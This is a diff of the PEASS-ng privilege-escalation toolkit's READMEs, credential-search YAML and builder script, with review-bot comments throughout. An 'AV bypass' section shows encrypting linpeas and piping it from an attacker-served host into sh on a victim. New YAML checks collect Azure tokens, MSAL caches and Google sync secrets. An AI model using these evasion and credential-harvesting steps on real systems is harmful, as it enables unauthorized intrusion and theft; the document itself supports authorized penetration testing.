From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*. From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that will be merged into linpeas.sh*.
The new linpeas.sh script will be auto-generated in the PR. The new linpeas.sh script will be auto-generated in the PR.
## Specific WinPEAS additions ## Specific WinPEAS additions
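Review bot: the CONTRIBUTING.md hunk only swaps the repository URLs and leaves the surrounding typos on the new side: `Do don't know how to help?`, `sesitive_files.yaml` (twice, in the link text), `where and example ... can be foud`, and `linpeas is auto-build`; since these lines are being touched anyway, fix them in the same change.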


@ -1,7 +1,7 @@
COPYING -- Describes the terms under which peass-ng is distributed. A copy COPYING -- Describes the terms under which peass-ng is distributed. A copy
of the GNU General Public License (GPL) is appended to this file. of the GNU General Public License (GPL) is appended to this file.
peass-ng is (C) 2006-2022 Carlos Polop Martin. peass-ng is (C) 2019-2024 Carlos Polop Martin.
This program is free software; you may redistribute and/or modify it under This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free the terms of the GNU General Public License as published by the Free
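Review bot: the copyright line changes the start year from 2006 to 2019 as well as the end year; if 2019 is the project's actual first release year that is a correction worth stating in the commit message, otherwise keep the earliest year and only bump the end year.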


@ -1,6 +1,6 @@
# PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation # PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/peass.png) ![](https://github.com/peass-ng/PEASS-ng/raw/master/linPEAS/images/peass.png)
![](https://img.shields.io/badge/Black-Arch-black) ![](https://img.shields.io/badge/Arch-AUR-brightgreen) ![](https://img.shields.io/badge/Black%20Hat%20Arsenal-Asia%202020-red) ![](https://img.shields.io/badge/Black-Arch-black) ![](https://img.shields.io/badge/Arch-AUR-brightgreen) ![](https://img.shields.io/badge/Black%20Hat%20Arsenal-Asia%202020-red)
@ -12,34 +12,29 @@ Here you will find **privilege escalation tools for Windows and Linux/Unix\* and
These tools search for possible **local privilege escalation paths** that you could exploit and print them to you **with nice colors** so you can recognize the misconfigurations easily. These tools search for possible **local privilege escalation paths** that you could exploit and print them to you **with nice colors** so you can recognize the misconfigurations easily.
- Check the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)** - Check the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.wiki](https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html)**
- **[WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)** - **[WinPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS) - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)**
- Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist)** - Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.wiki](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html)**
- **[LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)** - **[LinPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**
## Quick Start ## Quick Start
Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**. Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/peass-ng/PEASS-ng/releases/latest)**.
## JSON, HTML & PDF output ## JSON, HTML & PDF output
Check the **[parsers](./parsers/)** directory to **transform PEASS outputs to JSON, HTML and PDF** Check the **[parsers](./parsers/)** directory to **transform PEASS outputs to JSON, HTML and PDF**
## Support PEASS-ng and HackTricks and get benefits ## Join us!
Do you want to have **access the latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop?frequency=one-time) for individuals and companies**. If you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**
**LinPEAS, WinPEAS and MacPEAS** arent enough for you? Welcome [**The PEASS Family**](https://opensea.io/collection/the-peass-family/), a limited collection of [**exclusive NFTs**](https://opensea.io/collection/the-peass-family/) of our favourite PEASS in disguise, designed by my team. Go **get your favourite and make it yours!** And if you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**
You can also, join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts, or follow me on Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live). You can also, join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts, or follow me on Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).
## Let's improve PEASS together ## Let's improve PEASS together
If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/CONTRIBUTING.md)** file. If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/peass-ng/PEASS-ng/blob/master/CONTRIBUTING.md)** file.
## Advisory ## Advisory
All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission. All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
By Polop<sup>(TM)</sup>
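Review bot: the README hunk rewrites the sponsorship section but leaves two English slips on the new side of lines it touches: `Use it at your own machines` (should be `on`) in the Advisory paragraph and the stray comma in `You can also, join`; fix both here. The `hacktricks.xyz` links are correctly moved to `book.hacktricks.wiki`, but the new `By Polop<sup>(TM)</sup>` line is added with no blank line before it and will render attached to the Advisory paragraph.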


@ -1,7 +1,7 @@
# TODO # TODO
### Generate Nice Reports ### Generate Nice Reports
- [x] Create a parser from linpeas and winpeas.exe output to JSON. You can fin it [here](https://github.com/carlospolop/PEASS-ng/tree/master/parser). - [x] Create a parser from linpeas and winpeas.exe output to JSON. You can fin it [here](https://github.com/peass-ng/PEASS-ng/tree/master/parser).
- [ ] Create a python script that generates a nice HTML/PDF from the JSON output - [ ] Create a python script that generates a nice HTML/PDF from the JSON output
### Generate a DB of Known Vulnerable Binaries ### Generate a DB of Known Vulnerable Binaries
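Review bot: the typo "You can fin it" at L1553 survives the URL change; it should read "You can find it".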


@ -1,2 +1,3 @@
This is a placeholder. # This is a placeholder
To fill this yaml execute one of the scripts download_regexes.py or download_regexes.ps1 # It will be replaced by the actual regexes.yaml file
# generated by download-regexes.py or download-regexes.ps1 (execute it before building the tools)
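Review bot: the comment at L1562 names `download-regexes.py` / `download-regexes.ps1` with hyphens while the text it replaces (L1561) used `download_regexes.py` / `download_regexes.ps1`; check which spelling matches the real filenames before this becomes the documented instruction. Since the placeholder is valid YAML (comments only), a build run before the download step silently produces a linpeas with no regexes; making the builder fail when `regexes.yaml` still starts with this placeholder comment would catch that.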


@ -1271,6 +1271,8 @@ search:
value: value:
config: config:
auto_check: True auto_check: True
exec:
- '(pwsh -Command "Save-AzContext -Path /tmp/az-context3489ht.json" && cat /tmp/az-context3489ht.json && rm /tmp/az-context3489ht.json) || echo_not_found "pwsh"'
files: files:
#- name: "credentials" #- name: "credentials"
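Review bot: the new `exec` at L1571 writes the Azure context, which includes access tokens, to a fixed and predictable path under /tmp and only removes it if both `Save-AzContext` and `cat` succeed (the `&&` chain stops at the first failure, so a failing `cat` leaves the token file behind). Give the file a per-run name (derived from `$$` or `mktemp`) and run `rm -f` unconditionally after the `cat`. Note also that this check writes to disk even under `-s`, which the README below (L1719) documents as "Nothing will be written to disk"; gate it on stealth mode or document the exception.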
@ -1379,13 +1381,54 @@ search:
- common - common
- name: "AzureRMContext.json" - name: "AzureRMContext.json"
value:
bad_regex: "Id.*|Credential.*"
type: f
search_in:
- common
- name: "clouds.config"
value:
type: f
search_in:
- common
- name: "service_principal_entries.json"
value: value:
bad_regex: ".*" bad_regex: ".*"
type: f type: f
search_in: search_in:
- common - common
- name: "ErrorRecords" #Azure logs can contain creentials - name: "msal_token_cache.json"
value:
bad_regex: ".*"
type: f
search_in:
- common
- name: "msal_http_cache.bin"
value:
just_list_file: True
type: f
search_in:
- common
- name: "service_principal_entries.bin"
value:
just_list_file: True
type: f
search_in:
- common
- name: "msal_token_cache.bin"
value:
just_list_file: True
type: f
search_in:
- common
- name: "ErrorRecords" #Azure logs can contain crentials
value: value:
type: d type: d
search_in: search_in:
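Review bot: the comment at L1617 still misspells "credentials" ("creentials" became "crentials"). Separately, `bad_regex: ".*"` on `service_principal_entries.json` and `msal_token_cache.json` (L1589, L1595) highlights the whole file, which copies client secrets and refresh tokens verbatim into the report that operators usually save to disk; consider a narrower pattern such as the `Id.*|Credential.*` used for `AzureRMContext.json` (L1578), or `just_list_file: True` as for the `.bin` entries, so the report records that the cache exists without duplicating its contents.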
@ -1419,6 +1462,26 @@ search:
search_in: search_in:
- common - common
- name: "Google Cloud Directory Sync"
value:
files:
- name: "*.xml"
value:
bad_regex: "oAuth2RefreshToken.*|authCredentialsEncrypted.*"
type: d
search_in:
- common
- name: "Google Password Sync"
value:
files:
- name: "*.xml"
value:
bad_regex: "baseDN.*|authorizeUsername.*"
type: d
search_in:
- common
- name: Road Recon - name: Road Recon
value: value:
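Review bot: both new entries (L1624, L1633) use directory names containing spaces with `type: d` and a `*.xml` glob; confirm the builder quotes the `name` when it generates the search expression, otherwise "Google Cloud Directory Sync" is split into three tokens. The patterns `oAuth2RefreshToken.*|authCredentialsEncrypted.*` and `baseDN.*|authorizeUsername.*` are case-sensitive as written; if the search helper does not add a case-insensitive flag, a differently cased element name in another product version will be missed.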
@ -1438,7 +1501,7 @@ search:
config: config:
auto_check: True auto_check: True
exec: exec:
- ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting"; fi - ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.wiki/en/linux-hardening/freeipa-pentesting.html"; fi
files: files:
- name: "ipa" - name: "ipa"
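Review bot: style only: `ipa_exists="$(command -v ipa)"` at L1648 lacks the `2>/dev/null` that the other modules in this compare attach to `command -v` (for example L2076); aligning it keeps the modules uniform. The `print_info` URL now points at hacktricks.wiki, matching the rest of the change.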


@ -1,10 +1,10 @@
# LinPEAS - Linux Privilege Escalation Awesome Script # LinPEAS - Linux Privilege Escalation Awesome Script
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png) ![](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png)
**LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)** **LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. The checks are explained on [book.hacktricks.wiki](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html)**
Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist)**. Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.wiki](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html)**.
[![asciicast](https://asciinema.org/a/250532.png)](https://asciinema.org/a/309566) [![asciicast](https://asciinema.org/a/250532.png)](https://asciinema.org/a/309566)
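Review bot: the image URL at L1656 changes the owner to `peass-ng` but keeps the old repository name `privilege-escalation-awesome-scripts-suite`, while the releases link in the same README (L1672) uses `peass-ng/PEASS-ng`; unless a redirect for the old name exists under the new organisation the image will 404. Suggest `https://github.com/peass-ng/PEASS-ng/raw/master/linPEAS/images/linpeas.png`. Minor: "a script that search for" (L1657) should be "searches for".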
@ -12,12 +12,28 @@ Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks
Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed** Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed**
## Build your own linpeas!
The latest version of linpeas allows you to **select the checks you would like your linpeas to have** and built it only with those checks!
This allows to create **smaller and faster linpeas scripts** for stealth and speed purposes.
Check how to **select the checks you want to build [in your own linpeas following this link.](builder)**
Note that by default, in the releases pages of this repository, you will find a **linpeas with all the checks**.
## Differences between `linpeas_fat.sh`, `linpeas.sh` and `linpeas_small.sh`:
- **linpeas_fat.sh**: Contains all checks, even third party applications in base64 embedded.
- **linpeas.sh**: Contains all checks, but only the third party application `linux exploit suggester` is embedded. This is the default `linpeas.sh`.
- **linpeas_small.sh**: Contains only the most *important* checks making its size smaller.
## Quick Start ## Quick Start
Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**. Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/peass-ng/PEASS-ng/releases/latest)**.
```bash ```bash
# From github # From public github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
``` ```
```bash ```bash
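Review bot: typos in the new section: "built it only with those checks" (L1663) should be "build it", and "This allows to create" (L1664) should be "This allows you to create". The "Differences" list (L1668-L1670) duplicates the list in the new builder README (L1783-L1785) word for word; link to one copy rather than keeping two that will drift. L1675 pipes `curl | sh` straight from the releases endpoint; a checksum or signature verification step next to that one-liner would be worth a line, since this is the command most readers will copy.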
@ -42,11 +58,24 @@ less -r /dev/shm/linpeas.txt #Read with colors
```bash ```bash
# Use a linpeas binary # Use a linpeas binary
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64 wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64 chmod +x linpeas_linux_amd64
./linpeas_linux_amd64 ./linpeas_linux_amd64
``` ```
## AV bypass
```bash
#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
```
## Firmware Analysis ## Firmware Analysis
If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options. If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options.
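Review bot: `python -m SimpleHTTPServer` (L1689, L1693) is Python 2 only; on current systems the equivalent is `python3 -m http.server 80`. The passphrase given via `-pass pass:AVBypassWithAES` is visible in process listings and shell history on both ends, so the openssl variant only hides the script from static scanning of the file on disk, and the base64 variant (L1692-L1694) is encoding, not encryption, with the same one-step unwrap. One sentence saying that this defeats signature matching on the download, not behavioural detection of the running script, would set the right expectation.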
@ -63,19 +92,6 @@ bash /linpeas.sh -o software_information,interesting_files,api_keys_regex
bash /path/to/linpeas.sh -f /path/to/folder bash /path/to/linpeas.sh -f /path/to/folder
``` ```
## AV bypass
```bash
#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
```
## Basic Information ## Basic Information
The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS). The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS).
@ -95,7 +111,7 @@ By default linpeas takes around **4 mins** to complete, but It could take from *
**Interesting parameters:** **Interesting parameters:**
- **-a** (all checks except regex) - This will **execute also the check of processes during 1 min, will search more possible hashes inside files, and brute-force each user using `su` with the top2000 passwords.** - **-a** (all checks except regex) - This will **execute also the check of processes during 1 min, will search more possible hashes inside files, and brute-force each user using `su` with the top2000 passwords.**
- **-e** (extra enumeration) - This will execute **enumeration checkes that are avoided by default** - **-e** (extra enumeration) - This will execute **enumeration checkes that are avoided by default**
- **-r** (regex checks) - This will search for **hundreds of API keys of different platforms in the silesystem** - **-r** (regex checks) - This will search for **hundreds of API keys of different platforms in the Filesystem**
- **-s** (superfast & stealth) - This will bypass some time consuming checks - **Stealth mode** (Nothing will be written to disk) - **-s** (superfast & stealth) - This will bypass some time consuming checks - **Stealth mode** (Nothing will be written to disk)
- **-P** (Password) - Pass a password that will be used with `sudo -l` and bruteforcing other users - **-P** (Password) - Pass a password that will be used with `sudo -l` and bruteforcing other users
- **-D** (Debug) - Print information about the checks that haven't discovered anything and about the time each check took - **-D** (Debug) - Print information about the checks that haven't discovered anything and about the time each check took
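Review bot: L1717 still reads "enumeration checkes"; it should be "checks". The `-r` fix changes "silesystem" to "Filesystem" with a capital mid-sentence; lowercase "filesystem" matches the rest of the list.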
@ -144,56 +160,23 @@ With LinPEAS you can also **discover hosts automatically** using `fping`, `ping`
LinPEAS will **automatically search for this binaries** in `$PATH` and let you know if any of them is available. In that case you can use LinPEAS to hosts dicovery and/or port scanning. LinPEAS will **automatically search for this binaries** in `$PATH` and let you know if any of them is available. In that case you can use LinPEAS to hosts dicovery and/or port scanning.
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/network.png) ![](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/network.png)
## Colors ## Colors
<details>
<summary>Details</summary>
LinPEAS uses colors to indicate where does each section begin. But **it also uses them the identify potencial misconfigurations**. LinPEAS uses colors to indicate where does each section begin. But **it also uses them the identify potencial misconfigurations**.
The ![](https://placehold.it/15/b32400/000000?text=+) **Red/Yellow** ![](https://placehold.it/15/fff500/000000?text=+) color is used for identifing configurations that lead to PE (99% sure). - The ![](https://placehold.it/15/b32400/000000?text=+) **Red/Yellow** ![](https://placehold.it/15/fff500/000000?text=+) color is used for identifing configurations that lead to PE (99% sure).
The ![](https://placehold.it/15/b32400/000000?text=+) **Red** color is used for identifing suspicious configurations that could lead to PE: - The ![](https://placehold.it/15/b32400/000000?text=+) **Red** color is used for identifing suspicious configurations that could lead to privilege escalation.
- Possible exploitable kernel versions
- Vulnerable sudo versions
- Identify processes running as root
- Not mounted devices
- Dangerous fstab permissions
- Writable files in interesting directories
- SUID/SGID binaries that have some vulnerable version (it also specifies the vulnerable version)
- SUDO binaries that can be used to escalate privileges in sudo -l (without passwd) (https://gtfobins.github.io/)
- Check /etc/doas.conf
- 127.0.0.1 in netstat
- Known files that could contain passwords
- Capabilities in interesting binaries
- Interesting capabilities of a binary
- Writable folders and wilcards inside info about cron jobs
- Writables folders in PATH
- Groups that could lead to root
- Files that could contains passwords
- Suspicious cronjobs
The ![](https://placehold.it/15/66ff33/000000?text=+) **Green** color is used for: - The ![](https://placehold.it/15/66ff33/000000?text=+) **Green** color is used for known good configurations (based on the name not on the conten!)
- Common processes run by root
- Common not interesting devices to mount
- Not dangerous fstab permissions
- SUID/SGID common binaries (the bin was already found in other machines and searchsploit doesn't identify any vulnerable version)
- Common .sh files in path
- Common names of users executing processes
- Common cronjobs
The ![](https://placehold.it/15/0066ff/000000?text=+) **Blue** color is used for: - The ![](https://placehold.it/15/0066ff/000000?text=+) **Blue** color is used for: Users without shell & Mounted devices
- Users without shell
- Mounted devices
The ![](https://placehold.it/15/33ccff/000000?text=+) **Light Cyan** color is used for: - The ![](https://placehold.it/15/33ccff/000000?text=+) **Light Cyan** color is used for: Users with shell
- Users with shell
The ![](https://placehold.it/15/bf80ff/000000?text=+) **Light Magenta** color is used for: - The ![](https://placehold.it/15/bf80ff/000000?text=+) **Light Magenta** color is used for: Current username
- Current username
</details> </details>
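Review bot: the opening `<details>` and `<summary>` (L1726-L1727) appear on one side of this diff only, while `</details>` at L1764 is unchanged context on both sides; whichever side they are on, check that the new README has the two tags paired, or the rendered Colors section will either never collapse or swallow the following headings. Typos carried over: "potencial" (L1728), "identifing" (L1729-L1730), "conten!" (L1749, should be "content"). Dropping the itemised lists (L1731-L1748, L1750-L1756) removes the only place that said what each colour concretely flags (exploitable kernel and sudo versions, vulnerable SUID binaries, writable PATH folders, suspicious cron jobs); if that detail is meant to live elsewhere, link it, otherwise keep a shortened list.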
@ -218,15 +201,12 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
## Collaborate ## Collaborate
If you want to help with the TODO tasks or with anything, you can do it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues) or you can submit a pull request**. If you want to help with the TODO tasks or with anything, you can do it using **[github issues](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/issues) or you can submit a pull request**.
If you find any issue, please report it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**. If you find any issue, please report it using **[github issues](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/issues)**.
**Linpeas** is being **updated** every time I find something that could be useful to escalate privileges. **Linpeas** is being **updated** every time I find something that could be useful to escalate privileges.
## Advisory ## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>
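Review bot: the issues URLs at L1767-L1768 use `peass-ng/privilege-escalation-awesome-scripts-suite` while the releases URL in the same README (L1672) uses `peass-ng/PEASS-ng`; pick one repository path. Minor: "github issues" appears twice in two consecutive sentences; the second could simply read "please open an issue".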

linPEAS/builder/README.md Normal file

@ -0,0 +1,78 @@
# Build you own linpeas!
You can **build you own linpeas which will contain only the checks you want**. This is useful to reduce the time it takes to run linpeas and to make linpeas more stealth and modular.
## Quick start building linpeas.sh
It's possible to indicate the params `--all`, `--all-no-fat` and `--small` to build the classic `linpeas_fat.sh`, `linpeas.sh` and `linpeas_small.sh`:
- **linpeas_fat.sh**: Contains all checks, even third party applications in base64 embedded.
- **linpeas.sh**: Contains all checks, but only the third party application `linux exploit suggester` is embedded. This is the default `linpeas.sh`.
- **linpeas_small.sh**: Contains only the most *important* checks making its size smaller.
However, in order to indicate only some specific checks, you can use the `--include` and `--exclude` params. These arguments supports a comma separated list of modules to add or remove from the final linpeas. Note that the matchs are done by checking **if the module path string contains any of the words** indicated in those params. Therefore, if you want to inde all the tests from the `linpeas_parts/3_cloud` it's enough to indicate `--include "cloud"`. Or if you want to include only the check `linpeas_parts/3_cloud/1_Check_if_in_Cloud` you can indicate `--include "Check_if_in_Cloud"`.
```bash
# Run this commands from 1 level above the builder folder. From here: cd ..
# Build linpeas_fat (linpeas with all checks, even third party applications in base64 embedded)
python3 -m builder.linpeas_builder --all --output /tmp/linpeas_fat.sh
# Build regular linpeas
python3 -m builder.linpeas_builder --all-no-fat --output /tmp/linpeas.sh
# Build small linpeas
python3 -m builder.linpeas_builder --small --output /tmp/linpeas_small.sh
# Build linpeas only with container and cloud checks
python3 -m builder.linpeas_builder --include "container,cloud" --output /tmp/linpeas_custom.sh
# Build linpeas only with regexes
python3 -m builder.linpeas_builder --include "api_keys_regex" --output /tmp/linpeas_custom.sh
# Build linpeas only with some specific modules
## You can customize it as much as you want
python3 -m builder.linpeas_builder --include "CPU_info,Sudo_version,Clipboard_highlighted_text" --output /tmp/linpeas_custom.sh
# Build linpeas excluding some specific modules
python3 -m builder.linpeas_builder --exclude "CPU_info,Sudo_version,Clipboard_highlighted_text" --output /tmp/linpeas_custom.sh
```
## How to add new modules
Adding new modules is very easy. You just need to create a new file in the `linpeas_parts/<corresponding section>` folder with the following structure with the bash code to run. Note that every new module should have some specific metadata at the beggining of the file. This metadata is used by the builder to generate the final linpeas.
Metadata example:
```bash
# Title: Cloud - Check if in cloud
# ID: CL_Check_if_in_cloud
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check if the current system is inside a cloud environment
# License: GNU GPL
# Version: 1.0
# Functions Used: check_aws_codebuild, check_aws_ec2, check_aws_ecs, check_aws_lambda, check_az_app, check_az_vm, check_do, check_gcp, check_ibm_vm, check_tencent_cvm, print_list
# Global Variables: $is_aws_codebuild, $is_aws_ecs, $is_aws_ec2, , $is_aws_lambda, $is_az_app, $is_az_vm, $is_do, $is_gcp_vm, $is_gcp_function, $is_ibm_vm, $is_aws_ec2_beanstalk, $is_aliyun_ecs, $is_tencent_cvm
# Initial Functions: check_gcp, check_aws_ecs, check_aws_ec2, check_aws_lambda, check_aws_codebuild, check_do, check_ibm_vm, check_az_vm, check_az_app, check_aliyun_ecs, check_tencent_cvm
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
<code>
```
### Metadata parts explained
- **Title**: Title of the module
- **ID**: Unique identifier of the module. It has to be the same as the filename without the extension and with the section identifier as prefix (in this case `CL`)
- **Author**: Author of the module
- **Last Update**: Last update of the module
- **Description**: Description of the module
- **License**: License of the module
- **Version**: Version of the module
- **Functions Used**: Functions used by the module inside the bash code. If your module is using a function not defined here, linpeas won't be built.
- **Global Variables**: Global variables used by the module inside the bash code. If your module is using a global variable not defined here, linpeas won't be built.
- **Initial Functions**: Functions that are called at the beggining of the module. If your module is using a function not defined here, linpeas won't be built.
- **Generated Global Variables**: Global variables generated (given a relevant value) by the module. If your module is generating a global variable not defined here, linpeas won't be built.
- **Fat linpeas**: Set only as 1 if the module is loading a third party app, if not 0.
- **Small linpeas**: Set as 1 if it's a quick check, if not 0.
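Review bot: the `--exclude` example at L1803 is run without `--all`, `--all-no-fat`, `--small` or `--include`, which the builder's argument check in this compare (L1884-L1887) rejects; either state which base set `--exclude` applies to or show it combined with `--all-no-fat`. The "Fat linpeas" rule at L1836 ("set only as 1 if the module is loading a third party app") conflicts with L1784, which says the non-fat `linpeas.sh` embeds linux exploit suggester; document that exception next to the rule. The example metadata at L1817 has a stray ", ," in "Global Variables", which a parser splitting on commas will turn into an empty variable name. Typos: "Build you own" (L1779 and L1780), "matchs" and "inde all" (L1786, "matches", "include all"), "beggining" (L1806).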

File diff suppressed because one or more lines are too long


@ -5,29 +5,51 @@ from .src.yamlGlobals import FINAL_FAT_LINPEAS_PATH, FINAL_LINPEAS_PATH, TEMPORA
import os import os
import stat import stat
import argparse
#python3 -m builder.linpeas_builder # python3 -m builder.linpeas_builder
def main(): def main(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules, output):
# Load configuration # Load configuration
ploaded = PEASLoaded() ploaded = PEASLoaded()
# Build temporary linpeas_base.sh file # Build temporary linpeas_base.sh file
lbasebuilder = LinpeasBaseBuilder() lbasebuilder = LinpeasBaseBuilder(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules)
lbasebuilder.build() lbasebuilder.build()
# Build final linpeas.sh # Build final linpeas.sh
lbuilder = LinpeasBuilder(ploaded) lbuilder = LinpeasBuilder(ploaded)
lbuilder.build() lbuilder.build()
lbuilder.write_linpeas(FINAL_FAT_LINPEAS_PATH) lbuilder.write_linpeas(output)
lbuilder.write_linpeas(FINAL_LINPEAS_PATH, rm_startswith="FAT_LINPEAS") os.remove(TEMPORARY_LINPEAS_BASE_PATH) # Remove the built linpeas_base_temp.sh file
os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file
st = os.stat(FINAL_FAT_LINPEAS_PATH) st = os.stat(output)
os.chmod(FINAL_FAT_LINPEAS_PATH, st.st_mode | stat.S_IEXEC) os.chmod(output, st.st_mode | stat.S_IEXEC)
st = os.stat(FINAL_LINPEAS_PATH)
os.chmod(FINAL_LINPEAS_PATH, st.st_mode | stat.S_IEXEC)
if __name__ == "__main__": if __name__ == "__main__":
main() parser = argparse.ArgumentParser(description='Build you own linpeas.sh')
parser.add_argument('--all', action='store_true', help='Build linpeas with all modules (linpeas_fat).')
parser.add_argument('--all-no-fat', action='store_true', help='Build linpeas with all modules except fat ones.')
parser.add_argument('--no-network-scanning', action='store_true', help='Build linpeas without network scanning.')
